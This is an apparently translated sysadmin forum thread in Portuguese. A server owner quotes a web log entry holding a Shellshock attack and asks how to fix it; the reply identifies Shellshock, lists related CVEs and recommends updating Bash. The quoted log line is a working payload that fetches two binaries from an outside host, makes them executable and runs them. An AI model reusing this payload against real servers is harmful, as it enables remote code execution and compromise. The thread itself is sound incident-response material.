Descobrimos binários /tmp/susu1e /tmp/susu2executamos pelo usuário do servidor web.
Nos logs temos as seguintes entradas:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Mas encontramos apenas os códigos de erro 301, 302, 403, 404, 500 dessas solicitações. Nenhum código 200er que indique que o hack foi bem-sucedido.
Este é um problema de segurança comum? Como isso pode ser consertado? Ou como pode ser rastreado ainda mais?
Responder1
Este parece um ataque shellshock, foi anunciado pela primeira vez em 24 de setembro de 2014, quando o bash lançou a correção para esse bug.
O primeiro bug faz com que o Bash execute comandos involuntariamente quando os comandos são concatenados ao final das definições de função armazenadas nos valores das variáveis de ambiente.1[6] Poucos dias após a publicação deste documento, um intenso escrutínio das falhas de design subjacentes descobriu uma variedade de vulnerabilidades relacionadas (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, e CVE-2014-7187); que Ramey abordou com uma série de patches adicionais.
Você pode verificar se o seu sistema está vulnerável conforme explicado emComo testar se meu servidor está vulnerável ao bug ShellShock?
Você precisa atualizar seu sistema ou pelo menos sua versão do Bash para corrigir o problema.